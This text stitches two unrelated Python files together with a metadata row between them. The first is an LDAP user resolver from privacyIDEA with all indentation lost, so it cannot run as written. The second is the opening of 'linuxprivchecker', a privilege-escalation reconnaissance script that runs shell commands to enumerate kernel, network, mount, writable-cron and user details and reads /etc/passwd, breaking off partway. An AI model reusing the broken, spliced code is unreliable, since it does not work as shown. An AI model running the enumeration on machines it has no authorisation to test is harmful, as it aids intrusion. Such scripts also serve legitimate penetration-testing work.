# 2015-04-15 Cornelius Kölbel <[email protected]>
# Increase test coverage
# 2014-12-25 Cornelius Kölbel <[email protected]>
# Rewrite for flask migration
#
# This code is free software; you can redistribute it and/or
# modify it under the terms of the GNU AFFERO GENERAL PUBLIC LICENSE
# License as published by the Free Software Foundation; either
# version 3 of the License, or any later version.
#
# This code is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU AFFERO GENERAL PUBLIC LICENSE for more details.
#
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see <http://www.gnu.org/licenses/>.
#
__doc__ = """This is the resolver to find users in LDAP directories like
OpenLDAP and Active Directory.
The file is tested in tests/test_lib_resolver.py
"""
import logging
import yaml
import functools
from UserIdResolver import UserIdResolver
import ldap3
from ldap3 import MODIFY_REPLACE, MODIFY_ADD, MODIFY_DELETE
from ldap3 import Server, Tls, Connection
import ssl
import os.path
import traceback
import hashlib
import binascii
from privacyidea.lib.crypto import urandom, geturandom
from privacyidea.lib.utils import is_true
import datetime
from privacyidea.lib import _
from privacyidea.lib.utils import to_utf8
from privacyidea.lib.error import privacyIDEAError
import uuid
from ldap3.utils.conv import escape_bytes
CACHE = {}
log = logging.getLogger(__name__)
ENCODING = "utf-8"
# The number of rounds the resolver tries to reach a responding server in the
# pool
SERVERPOOL_ROUNDS = 2
# The number of seconds a non-responding server is removed from the server pool
SERVERPOOL_SKIP = 30
# 1 sec == 10^9 nano secs == 10^7 * (100 nano secs)
MS_AD_MULTIPLYER = 10 ** 7
MS_AD_START = datetime.datetime(1601, 1, 1)
if os.path.isfile("/etc/privacyidea/ldap-ca.crt"):
DEFAULT_CA_FILE = "/etc/privacyidea/ldap-ca.crt"
elif os.path.isfile("/etc/ssl/certs/ca-certificates.crt"):
DEFAULT_CA_FILE = "/etc/ssl/certs/ca-certificates.crt"
elif os.path.isfile("/etc/ssl/certs/ca-bundle.crt"):
DEFAULT_CA_FILE = "/etc/ssl/certs/ca-bundle.crt"
else:
DEFAULT_CA_FILE = "/etc/privacyidea/ldap-ca.crt"
def get_ad_timestamp_now():
"""
returns the current UTC time as it is used in Active Directory in the
attribute accountExpires.
This is 100-nano-secs since 1.1.1601
:return: time
:rtype: int
"""
utc_now = datetime.datetime.utcnow()
elapsed_time = utc_now - MS_AD_START
total_seconds = elapsed_time.total_seconds()
# convert this to (100 nanoseconds)
return int(MS_AD_MULTIPLYER * total_seconds)
def trim_objectGUID(userId):
userId = uuid.UUID("{{{0!s}}}".format(userId)).bytes_le
userId = escape_bytes(userId)
return userId
def get_info_configuration(noschemas):
"""
Given the value of the NOSCHEMAS config option, return the value that should
be passed as ldap3's `get_info` argument.
:param noschemas: a boolean
:return: one of ldap3.SCHEMA or ldap3.NONE
"""
get_schema_info = ldap3.SCHEMA
if noschemas:
get_schema_info = ldap3.NONE
log.debug("Get LDAP schema info: {0!s}".format(get_schema_info))
return get_schema_info
def cache(func):
"""
cache the user with his loginname, resolver and UID in a local
dictionary cache.
This is a per process cache.
"""
@functools.wraps(func)
def cache_wrapper(self, *args, **kwds):
# If it does not exist, create the node for this instance
resolver_id = self.getResolverId()
if not resolver_id in CACHE:
CACHE[resolver_id] = {"getUserId": {},
"getUserInfo": {},
"_getDN": {}}
# get the portion of the cache for this very LDAP resolver
r_cache = CACHE.get(resolver_id).get(func.func_name)
if args[0] in r_cache and \
datetime.datetime.now() < r_cache[args[0]][
"timestamp"] + \
datetime.timedelta(seconds=self.cache_timeout):
log.debug("Reading {0!s} from cache for {1!s}".format(args[0],
func.func_name))
return r_cache[args[0]]["value"]
f_result = func(self, *args, **kwds)
# now we cache the result
CACHE[resolver_id][func.func_name][args[0]] = {
"value": f_result,
"timestamp": datetime.datetime.now()}
return f_result
return cache_wrapper
class AUTHTYPE(object):
SIMPLE = "Simple"
SASL_DIGEST_MD5 = "SASL Digest-MD5"
NTLM = "NTLM"
class IdResolver (UserIdResolver):
# If the resolver could be configured editable
updateable = True
def __init__(self):
self.i_am_bound = False
self.uri = ""
self.basedn = ""
self.binddn = ""
self.bindpw = ""
self.object_classes = []
self.dn_template = ""
self.timeout = 5.0 # seconds!
self.sizelimit = 500
self.loginname_attribute = ""
self.searchfilter = ""
self.userinfo = {}
self.uidtype = ""
self.noreferrals = False
self._editable = False
self.resolverId = self.uri
self.scope = ldap3.SUBTREE
self.cache_timeout = 120
self.tls_context = None
self.start_tls = False
def checkPass(self, uid, password):
"""
This function checks the password for a given uid.
- returns true in case of success
- false if password does not match
"""
if self.authtype == AUTHTYPE.NTLM: # pragma: no cover
# fetch the PreWindows 2000 Domain from the self.binddn
# which would be of the format DOMAIN\username and compose the
# bind_user to DOMAIN\sAMAcountName
domain_name = self.binddn.split('\\')[0]
uinfo = self.getUserInfo(uid)
# In fact we need the sAMAccountName. If the username mapping is
# another attribute than the sAMAccountName the authentication
# will fail!
bind_user = "{0!s}\{1!s}".format(domain_name, uinfo.get("username"))
else:
bind_user = self._getDN(uid)
server_pool = self.get_serverpool(self.uri, self.timeout,
get_info=ldap3.NONE,
tls_context=self.tls_context)
try:
log.debug("Authtype: {0!r}".format(self.authtype))
log.debug("user : {0!r}".format(bind_user))
# Whatever happens. If we have an empty bind_user, we must break
# since we must avoid anonymous binds!
if not bind_user or len(bind_user) < 1:
raise Exception("No valid user. Empty bind_user.")
l = self.create_connection(authtype=self.authtype,
server=server_pool,
user=bind_user,
password=password,
receive_timeout=self.timeout,
auto_referrals=not self.noreferrals,
start_tls=self.start_tls)
r = l.bind()
log.debug("bind result: {0!r}".format(r))
if not r:
raise Exception("Wrong credentials")
log.debug("bind seems successful.")
l.unbind()
log.debug("unbind successful.")
except Exception as e:
log.warning("failed to check password for {0!r}/{1!r}: {2!r}".format(uid, bind_user, e))
log.debug(traceback.format_exc())
return False
return True
def _trim_result(self, result_list):
"""
The resultlist can contain entries of type:searchResEntry and of
type:searchResRef. If self.noreferrals is true, all type:searchResRef
will be removed.
:param result_list: The result list of a LDAP search
:type result_list: resultlist (list of dicts)
:return: new resultlist
"""
if self.noreferrals:
new_list = []
for result in result_list:
if result.get("type") == "searchResEntry":
new_list.append(result)
elif result.get("type") == "searchResRef":
# This is a Referral
pass
else:
new_list = result_list
return new_list
@staticmethod
def _escape_loginname(loginname):
"""
This function escapes the loginname according to
https://msdn.microsoft.com/en-us/library/aa746475(v=vs.85).aspx
This is to avoid username guessing by trying to login as user
a*
ac*
ach*
achm*
achme*
achemd*
:param loginname: The loginname
:return: The escaped loginname
"""
return loginname.replace("\\", "\\5c").replace("*", "\\2a").replace(
"(", "\\28").replace(")", "\\29").replace("/", "\\2f")
@staticmethod
def _get_uid(entry, uidtype):
uid = None
if uidtype.lower() == "dn":
uid = entry.get("dn")
else:
attributes = entry.get("attributes")
if type(attributes.get(uidtype)) == list:
uid = attributes.get(uidtype)[0]
else:
uid = attributes.get(uidtype)
return uid
def _trim_user_id(self, userId):
"""
If we search for the objectGUID we can not search for the normal
string representation but we need to search for the bytestring in AD.
:param userId: The userId
:return: the trimmed userId
"""
if self.uidtype == "objectGUID":
userId = trim_objectGUID(userId)
return userId
@cache
def _getDN(self, userId):
"""
This function returns the DN of a userId.
Therefor it evaluates the self.uidtype.
:param userId: The userid of a user
:type userId: string
:return: The DN of the object.
"""
dn = ""
if self.uidtype.lower() == "dn":
dn = userId
else:
# get the DN for the Object
self._bind()
search_userId = self._trim_user_id(userId)
filter = "(&{0!s}({1!s}={2!s}))".format(self.searchfilter,
self.uidtype, search_userId)
self.l.search(search_base=self.basedn,
search_scope=self.scope,
search_filter=filter,
attributes=self.userinfo.values())
r = self.l.response
r = self._trim_result(r)
if len(r) > 1: # pragma: no cover
raise Exception("Found more than one object for uid {0!r}".format(userId))
elif len(r) == 1:
dn = r[0].get("dn")
else:
log.info("The filter {0!s} returned no DN.".format(filter))
return dn
def _bind(self):
if not self.i_am_bound:
server_pool = self.get_serverpool(self.uri, self.timeout,
get_info=self.get_info,
tls_context=self.tls_context)
self.l = self.create_connection(authtype=self.authtype,
server=server_pool,
user=self.binddn,
password=self.bindpw,
receive_timeout=self.timeout,
auto_referrals=not
self.noreferrals,
start_tls=self.start_tls)
#log.error("LDAP Server Pool States: %s" % server_pool.pool_states)
if not self.l.bind():
raise Exception("Wrong credentials")
self.i_am_bound = True
@cache
def getUserInfo(self, userId):
"""
This function returns all user info for a given userid/object.
:param userId: The userid of the object
:type userId: string
:return: A dictionary with the keys defined in self.userinfo
:rtype: dict
"""
ret = {}
self._bind()
if self.uidtype.lower() == "dn":
# encode utf8, so that also german ulauts work in the DN
self.l.search(search_base=to_utf8(userId),
search_scope=self.scope,
search_filter="(&" + self.searchfilter + ")",
attributes=self.userinfo.values())
else:
search_userId = self._trim_user_id(userId)
filter = "(&{0!s}({1!s}={2!s}))".format(self.searchfilter,
self.uidtype, search_userId)
self.l.search(search_base=self.basedn,
search_scope=self.scope,
search_filter=filter,
attributes=self.userinfo.values())
r = self.l.response
r = self._trim_result(r)
if len(r) > 1: # pragma: no cover
raise Exception("Found more than one object for uid {0!r}".format(userId))
for entry in r:
attributes = entry.get("attributes")
ret = self._ldap_attributes_to_user_object(attributes)
return ret
def _ldap_attributes_to_user_object(self, attributes):
"""
This helper function converts the LDAP attributes to a dictionary for
the privacyIDEA user. The LDAP Userinfo mapping is used to do so.
:param attributes:
:return: dict with privacyIDEA users.
"""
ret = {}
for ldap_k, ldap_v in attributes.items():
for map_k, map_v in self.userinfo.items():
if ldap_k == map_v:
if ldap_k == "objectGUID":
ret[map_k] = ldap_v[0]
elif type(ldap_v) == list and map_k not in ["mobile"]:
# All lists (except) mobile return the first value as
# a string. Mobile is returned as a list
if ldap_v:
ret[map_k] = ldap_v[0]
else:
ret[map_k] = ""
else:
ret[map_k] = ldap_v
return ret
def getUsername(self, user_id):
"""
Returns the username/loginname for a given user_id
:param user_id: The user_id in this resolver
:type user_id: string
:return: username
:rtype: string
"""
info = self.getUserInfo(user_id)
return info.get('username', "")
@cache
def getUserId(self, LoginName):
"""
resolve the loginname to the userid.
:param LoginName: The login name from the credentials
:type LoginName: string
:return: UserId as found for the LoginName
"""
userid = ""
self._bind()
filter = "(&{0!s}({1!s}={2!s}))".format(self.searchfilter, self.loginname_attribute,
self._escape_loginname(LoginName))
# create search attributes
attributes = self.userinfo.values()
if self.uidtype.lower() != "dn":
attributes.append(str(self.uidtype))
log.debug("Searching user {0!r} in LDAP.".format(LoginName))
self.l.search(search_base=self.basedn,
search_scope=self.scope,
search_filter=filter,
attributes=attributes)
r = self.l.response
r = self._trim_result(r)
if len(r) > 1: # pragma: no cover
raise Exception("Found more than one object for Loginname {0!r}".format(
LoginName))
for entry in r:
userid = self._get_uid(entry, self.uidtype)
return userid
def getUserList(self, searchDict):
"""
:param searchDict: A dictionary with search parameters
:type searchDict: dict
:return: list of users, where each user is a dictionary
"""
ret = []
self._bind()
attributes = self.userinfo.values()
ad_timestamp = get_ad_timestamp_now()
if self.uidtype.lower() != "dn":
attributes.append(str(self.uidtype))
# do the filter depending on the searchDict
filter = u"(&" + self.searchfilter
for search_key in searchDict.keys():
if search_key == "accountExpires":
comperator = ">="
if searchDict[search_key] in ["1", 1]:
comperator = "<="
filter += "(&({0!s}{1!s}{2!s})(!({3!s}=0)))".format(self.userinfo[search_key],
comperator,
get_ad_timestamp_now(),
self.userinfo[search_key])
else:
filter += u"({0!s}={1!s})".format(self.userinfo[search_key],
searchDict[search_key])
filter += ")"
g = self.l.extend.standard.paged_search(search_base=self.basedn,
search_filter=filter,
search_scope=self.scope,
attributes=attributes,
paged_size=100,
size_limit=self.sizelimit,
generator=True)
# returns a generator of dictionaries
for entry in g:
# Simple fix for ignored sizelimit with Active Directory
if len(ret) >= self.sizelimit:
break
try:
attributes = entry.get("attributes")
user = self._ldap_attributes_to_user_object(attributes)
user['userid'] = self._get_uid(entry, self.uidtype)
ret.append(user)
except Exception as exx: # pragma: no cover
log.error("Error during fetching LDAP objects: {0!r}".format(exx))
log.debug("{0!s}".format(traceback.format_exc()))
return ret
def getResolverId(self):
"""
Returns the resolver Id
This should be an Identifier of the resolver, preferable the type
and the name of the resolver.
"""
s = "{0!s}{1!s}{2!s}{3!s}".format(self.uri, self.basedn,
self.searchfilter, self.userinfo)
r = binascii.hexlify(hashlib.sha1(s).digest())
return r
@staticmethod
def getResolverClassType():
return 'ldapresolver'
@staticmethod
def getResolverDescriptor():
return IdResolver.getResolverClassDescriptor()
@staticmethod
def getResolverType():
return IdResolver.getResolverClassType()
def loadConfig(self, config):
"""
Load the config from conf.
:param config: The configuration from the Config Table
:type config: dict
'#ldap_uri': 'LDAPURI',
'#ldap_basedn': 'LDAPBASE',
'#ldap_binddn': 'BINDDN',
'#ldap_password': 'BINDPW',
'#ldap_timeout': 'TIMEOUT',
'#ldap_sizelimit': 'SIZELIMIT',
'#ldap_loginattr': 'LOGINNAMEATTRIBUTE',
'#ldap_searchfilter': 'LDAPSEARCHFILTER',
'#ldap_mapping': 'USERINFO',
'#ldap_uidtype': 'UIDTYPE',
'#ldap_noreferrals' : 'NOREFERRALS',
'#ldap_editable' : 'EDITABLE',
'#ldap_certificate': 'CACERTIFICATE',
"""
self.uri = config.get("LDAPURI")
self.basedn = config.get("LDAPBASE")
self.binddn = config.get("BINDDN")
# object_classes is a comma separated list like
# ["top", "person", "organizationalPerson", "user", "inetOrgPerson"]
self.object_classes = [cl.strip() for cl in config.get("OBJECT_CLASSES", "").split(",")]
self.dn_template = config.get("DN_TEMPLATE", "")
self.bindpw = config.get("BINDPW")
self.timeout = float(config.get("TIMEOUT", 5))
self.cache_timeout = int(config.get("CACHE_TIMEOUT", 120))
self.sizelimit = int(config.get("SIZELIMIT", 500))
self.loginname_attribute = config.get("LOGINNAMEATTRIBUTE")
self.searchfilter = config.get("LDAPSEARCHFILTER")
userinfo = config.get("USERINFO", "{}")
self.userinfo = yaml.safe_load(userinfo)
self.userinfo["username"] = self.loginname_attribute
self.map = yaml.safe_load(userinfo)
self.uidtype = config.get("UIDTYPE", "DN")
self.noreferrals = is_true(config.get("NOREFERRALS", False))
self.start_tls = is_true(config.get("START_TLS", False))
self.get_info = get_info_configuration(is_true(config.get("NOSCHEMAS", False)))
self._editable = config.get("EDITABLE", False)
self.scope = config.get("SCOPE") or ldap3.SUBTREE
self.resolverId = self.uri
self.authtype = config.get("AUTHTYPE", AUTHTYPE.SIMPLE)
self.tls_verify = is_true(config.get("TLS_VERIFY", False))
self.tls_ca_file = config.get("TLS_CA_FILE") or DEFAULT_CA_FILE
if self.tls_verify and (self.uri.lower().startswith("ldaps") or
self.start_tls):
self.tls_context = Tls(validate=ssl.CERT_REQUIRED,
version=ssl.PROTOCOL_TLSv1,
ca_certs_file=self.tls_ca_file)
else:
self.tls_context = None
return self
@staticmethod
def split_uri(uri):
"""
Splits LDAP URIs like:
* ldap://server
* ldaps://server
* ldap[s]://server:1234
* server
:param uri: The LDAP URI
:return: Returns a tuple of Servername, Port and SSL(bool)
"""
port = None
ssl = False
ldap_elems = uri.split(":")
if len(ldap_elems) == 3:
server = ldap_elems[1].strip("/")
port = int(ldap_elems[2])
if ldap_elems[0].lower() == "ldaps":
ssl = True
else:
ssl = False
elif len(ldap_elems) == 2:
server = ldap_elems[1].strip("/")
port = None
if ldap_elems[0].lower() == "ldaps":
ssl = True
else:
ssl = False
else:
server = uri
return server, port, ssl
@classmethod
def get_serverpool(cls, urilist, timeout, get_info=None, tls_context=None):
"""
This create the serverpool for the ldap3 connection.
The URI from the LDAP resolver can contain a comma separated list of
LDAP servers. These are split and then added to the pool.
See
https://github.com/cannatag/ldap3/blob/master/docs/manual/source/servers.rst#server-pool
:param urilist: The list of LDAP URIs, comma separated
:type urilist: basestring
:param timeout: The connection timeout
:type timeout: float
:param get_info: The get_info type passed to the ldap3.Sever
constructor. default: ldap3.SCHEMA, should be ldap3.NONE in case
of a bind.
:param tls_context: A ldap3.tls object, which defines if certificate
verification should be performed
:return: Server Pool
:rtype: LDAP3 Server Pool Instance
"""
get_info = get_info or ldap3.SCHEMA
server_pool = ldap3.ServerPool(None, ldap3.ROUND_ROBIN,
active=SERVERPOOL_ROUNDS,
exhaust=SERVERPOOL_SKIP)
for uri in urilist.split(","):
uri = uri.strip()
host, port, ssl = cls.split_uri(uri)
server = ldap3.Server(host, port=port,
use_ssl=ssl,
connect_timeout=float(timeout),
get_info=get_info,
tls=tls_context)
server_pool.add(server)
log.debug("Added {0!s}, {1!s}, {2!s} to server pool.".format(host, port, ssl))
return server_pool
@classmethod
def getResolverClassDescriptor(cls):
"""
return the descriptor of the resolver, which is
- the class name and
- the config description
:return: resolver description dict
:rtype: dict
"""
descriptor = {}
typ = cls.getResolverType()
descriptor['clazz'] = "useridresolver.LDAPIdResolver.IdResolver"
descriptor['config'] = {'LDAPURI': 'string',
'LDAPBASE': 'string',
'BINDDN': 'string',
'BINDPW': 'password',
'TIMEOUT': 'int',
'SIZELIMIT': 'int',
'LOGINNAMEATTRIBUTE': 'string',
'LDAPSEARCHFILTER': 'string',
'USERINFO': 'string',
'UIDTYPE': 'string',
'NOREFERRALS': 'bool',
'NOSCHEMAS': 'bool',
'CACERTIFICATE': 'string',
'EDITABLE': 'bool',
'SCOPE': 'string',
'AUTHTYPE': 'string',
'TLS_VERIFY': 'bool',
'TLS_CA_FILE': 'string',
'START_TLS': 'bool'}
return {typ: descriptor}
@classmethod
def testconnection(cls, param):
"""
This function lets you test the to be saved LDAP connection.
:param param: A dictionary with all necessary parameter to test
the connection.
:type param: dict
:return: Tuple of success and a description
:rtype: (bool, string)
Parameters are:
BINDDN, BINDPW, LDAPURI, TIMEOUT, LDAPBASE, LOGINNAMEATTRIBUTE,
LDAPSEARCHFILTER, USERINFO, SIZELIMIT, NOREFERRALS, CACERTIFICATE,
AUTHTYPE, TLS_VERIFY, TLS_CA_FILE
"""
success = False
uidtype = param.get("UIDTYPE")
timeout = float(param.get("TIMEOUT", 5))
ldap_uri = param.get("LDAPURI")
size_limit = int(param.get("SIZELIMIT", 500))
if is_true(param.get("TLS_VERIFY")) \
and (ldap_uri.lower().startswith("ldaps") or
param.get("START_TLS")):
tls_ca_file = param.get("TLS_CA_FILE") or DEFAULT_CA_FILE
tls_context = Tls(validate=ssl.CERT_REQUIRED,
version=ssl.PROTOCOL_TLSv1,
ca_certs_file=tls_ca_file)
else:
tls_context = None
get_info = get_info_configuration(is_true(param.get("NOSCHEMAS")))
try:
server_pool = cls.get_serverpool(ldap_uri, timeout,
tls_context=tls_context,
get_info=get_info)
l = cls.create_connection(authtype=param.get("AUTHTYPE",
AUTHTYPE.SIMPLE),
server=server_pool,
user=param.get("BINDDN"),
password=param.get("BINDPW"),
receive_timeout=timeout,
auto_referrals=not param.get(
"NOREFERRALS"),
start_tls=param.get("START_TLS", False))
#log.error("LDAP Server Pool States: %s" % server_pool.pool_states)
if not l.bind():
raise Exception("Wrong credentials")
# create searchattributes
attributes = yaml.safe_load(param["USERINFO"]).values()
if uidtype.lower() != "dn":
attributes.append(str(uidtype))
# search for users...
g = l.extend.standard.paged_search(
search_base=param["LDAPBASE"],
search_filter="(&" + param["LDAPSEARCHFILTER"] + ")",
search_scope=param.get("SCOPE") or ldap3.SUBTREE,
attributes=attributes,
paged_size=100,
size_limit=size_limit,
generator=True)
# returns a generator of dictionaries
count = 0
uidtype_count = 0
for entry in g:
try:
userid = cls._get_uid(entry, uidtype)
count += 1
if userid:
uidtype_count += 1
except Exception as exx: # pragma: no cover
log.warning("Error during fetching LDAP objects:"
" {0!r}".format(exx))
log.debug("{0!s}".format(traceback.format_exc()))
if uidtype_count < count: # pragma: no cover
desc = _("Your LDAP config found %i user objects, but only %i "
"with the specified uidtype" % (count, uidtype_count))
else:
desc = _("Your LDAP config seems to be OK, %i user objects "
"found.") % count
l.unbind()
success = True
except Exception as e:
desc = "{0!r}".format(e)
return success, desc
def add_user(self, attributes=None):
"""
Add a new user to the LDAP directory.
The user can only be created in the LDAP using a DN.
So we have to construct the DN out of the given attributes.
attributes are these
"username", "surname", "givenname", "email",
"mobile", "phone", "password"
:param attributes: Attributes according to the attribute mapping
:type attributes: dict
:return: The new UID of the user. The UserIdResolver needs to
determine the way how to create the UID.
"""
# TODO: We still have some utf8 issues creating users with special characters.
attributes = attributes or {}
dn = self.dn_template
dn = dn.replace("<basedn>", self.basedn)
dn = dn.replace("<username>", attributes.get("username", ""))
dn = dn.replace("<givenname>", attributes.get("givenname", ""))
dn = dn.replace("<surname>", attributes.get("surname", ""))
try:
self._bind()
params = self._attributes_to_ldap_attributes(attributes)
self.l.add(dn, self.object_classes, params)
except Exception as e:
log.error("Error accessing LDAP server: {0}".format(e))
log.debug("{0}".format(traceback.format_exc()))
raise privacyIDEAError(e)
if self.l.result.get('result') != 0:
log.error("Error during adding of user {0}: {1}".format(dn, self.l.result.get('message')))
raise privacyIDEAError(self.l.result.get('message'))
return self.getUserId(attributes.get("username"))
def delete_user(self, uid):
"""
Delete a user from the LDAP Directory.
The user is referenced by the user id.
:param uid: The uid of the user object, that should be deleted.
:type uid: basestring
:return: Returns True in case of success
:rtype: bool
"""
res = True
try:
self._bind()
self.l.delete(self._getDN(uid))
except Exception as exx:
log.error("Error deleting user: {0}".format(exx))
res = False
return res
def _attributes_to_ldap_attributes(self, attributes):
"""
takes the attributes and maps them to the LDAP attributes
:param attributes: Attributes to be updated
:type attributes: dict
:return: dict with attribute name as keys and values
"""
ldap_attributes = {}
for fieldname, value in attributes.iteritems():
if self.map.get(fieldname):
if fieldname == "password":
# Variable value may be either a string or a list
# so catch the TypeError exception if we get the wrong
# variable type
try:
pw_hash = self._create_ssha(value[1][0])
value[1][0] = pw_hash
ldap_attributes[self.map.get(fieldname)] = value
except TypeError as e:
pw_hash = self._create_ssha(value)
ldap_attributes[self.map.get(fieldname)] = pw_hash
else:
ldap_attributes[self.map.get(fieldname)] = value
return ldap_attributes
@staticmethod
def _create_ssha(password):
"""
Encodes the given password as a base64 SSHA hash
:param password: string to hash
:type password: basestring
:return: string encoded as a base64 SSHA hash
"""
salt = geturandom(4)
# Hash password string and append the salt
sha_hash = hashlib.sha1(password)
sha_hash.update(salt)
# Create a base64 encoded string
digest_b64 = '{0}{1}'.format(sha_hash.digest(),
salt).encode('base64').strip()
# Tag it with SSHA
tagged_digest = '{{SSHA}}{}'.format(digest_b64)
return tagged_digest
def _create_ldap_modify_changes(self, attributes, uid):
"""
Identifies if an LDAP attribute already exists and if the value needs to be updated, deleted or added.
:param attributes: Attributes to be updated
:type attributes: dict
:param uid: The uid of the user object in the resolver
:type uid: basestring
:return: dict with attribute name as keys and values
"""
modify_changes = {}
uinfo = self.getUserInfo(uid)
for fieldname, value in attributes.iteritems():
if value:
if fieldname in uinfo:
modify_changes[fieldname] = [MODIFY_REPLACE, [value]]
else:
modify_changes[fieldname] = [MODIFY_ADD, [value]]
else:
modify_changes[fieldname] = [MODIFY_DELETE, [value]]
return modify_changes
def update_user(self, uid, attributes=None):
"""
Update an existing user.
This function is also used to update the password. Since the
attribute mapping know, which field contains the password,
this function can also take care for password changing.
Attributes that are not contained in the dict attributes are not
modified.
:param uid: The uid of the user object in the resolver.
:type uid: basestring
:param attributes: Attributes to be updated.
:type attributes: dict
:return: True in case of success
"""
attributes = attributes or {}
try:
self._bind()
mapped = self._create_ldap_modify_changes(attributes, uid)
params = self._attributes_to_ldap_attributes(mapped)
self.l.modify(self._getDN(uid), params)
except Exception as e:
log.error("Error accessing LDAP server: {0!s}".format(e))
log.debug("{0!s}".format(traceback.format_exc()))
return False
if self.l.result.get('result') != 0:
log.error("Error during update of user {0!s}: {1!s}".format(uid, self.l.result.get("message")))
return False
return True
@staticmethod
def create_connection(authtype=None, server=None, user=None,
password=None, auto_bind=False,
client_strategy=ldap3.SYNC,
check_names=True,
auto_referrals=False,
receive_timeout=5,
start_tls=False):
"""
Create a connection to the LDAP server.
:param authtype:
:param server:
:param user:
:param password:
:param auto_bind:
:param client_strategy:
:param check_names:
:param auto_referrals:
:param receive_timeout: At the moment we do not use this,
since receive_timeout is not supported by ldap3 < 2.
:return:
"""
authentication = None
if not user:
authentication = ldap3.ANONYMOUS
if authtype == AUTHTYPE.SIMPLE:
if not authentication:
authentication = ldap3.SIMPLE
# SIMPLE works with passwords as UTF8 and unicode
l = ldap3.Connection(server, user=user,
password=password,
auto_bind=auto_bind,
client_strategy=client_strategy,
authentication=authentication,
check_names=check_names,
# receive_timeout=receive_timeout,
auto_referrals=auto_referrals)
elif authtype == AUTHTYPE.NTLM: # pragma: no cover
if not authentication:
authentication = ldap3.NTLM
# NTLM requires the password to be unicode
l = ldap3.Connection(server,
user=user,
password=password,
auto_bind=auto_bind,
client_strategy=client_strategy,
authentication=authentication,
check_names=check_names,
# receive_timeout=receive_timeout,
auto_referrals=auto_referrals)
elif authtype == AUTHTYPE.SASL_DIGEST_MD5: # pragma: no cover
if not authentication:
authentication = ldap3.SASL
password = to_utf8(password)
sasl_credentials = (str(user), str(password))
l = ldap3.Connection(server,
sasl_mechanism="DIGEST-MD5",
sasl_credentials=sasl_credentials,
auto_bind=auto_bind,
client_strategy=client_strategy,
authentication=authentication,
check_names=check_names,
# receive_timeout=receive_timeout,
auto_referrals=auto_referrals)
else:
raise Exception("Authtype {0!s} not supported".format(authtype))
if start_tls:
l.open(read_server_info=False)
log.debug("Doing start_tls")
r = l.start_tls(read_server_info=False)
return l
@property
def editable(self):
"""
Return true, if the instance of the resolver is configured editable
:return:
"""
# Depending on the database this might look different
# Usually this is "1"
return is_true(self._editable)
| agpl-3.0 | -6,267,946,050,107,101,000 | 37.796089 | 110 | 0.532508 | false |
blindfuzzy/LHF | Tools/linuxprivchk.py | 1 | 25080 | #!/usr/bin/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
##-------------------------------------------------------------------------------------------------------------
## [Warning]:
## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates,
## I did not write it to be efficient and in some cases you may find the functions may not produce the desired
## results. For example, the function that links packages to running processes is based on keywords and will
## not always be accurate. Also, the exploit list included in this function will need to be updated over time.
## Feel free to change or improve it any way you see fit.
##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
###############################################################################################################
# conditional import for older versions of python not compatible with subprocess
try:
import subprocess as sub
compatmode = 0 # newer version of python, no need for compatibility mode
except ImportError:
import os # older version of python, need to use os instead
compatmode = 1
# title / formatting
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"
print bigline
print "LINUX PRIVILEGE ESCALATION CHECKER"
print bigline
print
# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
for item in cmdDict:
cmd = cmdDict[item]["cmd"]
if compatmode == 0: # newer version of python, use preferred subprocess
out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
results = out.split('\n')
else: # older version of python, use os.popen
echo_stdout = os.popen(cmd, 'r')
results = echo_stdout.read().split('\n')
cmdDict[item]["results"]=results
return cmdDict
# print results for each previously executed command, no return value
def printResults(cmdDict):
for item in cmdDict:
msg = cmdDict[item]["msg"]
results = cmdDict[item]["results"]
print "[+] " + msg
for result in results:
if result.strip() != "":
print " " + result.strip()
print
return
def writeResults(msg, results):
f = open("privcheckout.txt", "a");
f.write("[+] " + str(len(results)-1) + " " + msg)
for result in results:
if result.strip() != "":
f.write(" " + result.strip())
f.close()
return
# Basic system info
print "[*] GETTING BASIC SYSTEM INFO...\n"
results=[]
sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results},
"KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results},
"HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results}
}
sysInfo = execCmd(sysInfo)
printResults(sysInfo)
# Networking Info
print "[*] GETTING NETWORKING INFO...\n"
netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
"ROUTE":{"cmd":"route", "msg":"Route", "results":results},
"NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results}
}
netInfo = execCmd(netInfo)
printResults(netInfo)
# File System Info
print "[*] GETTING FILESYSTEM INFO...\n"
driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
"FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
}
driveInfo = execCmd(driveInfo)
printResults(driveInfo)
# Scheduled Cron Jobs
cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results},
"CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results}
}
cronInfo = execCmd(cronInfo)
printResults(cronInfo)
# User Info
print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
"ID":{"cmd":"id","msg":"Current User ID", "results":results},
"ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results},
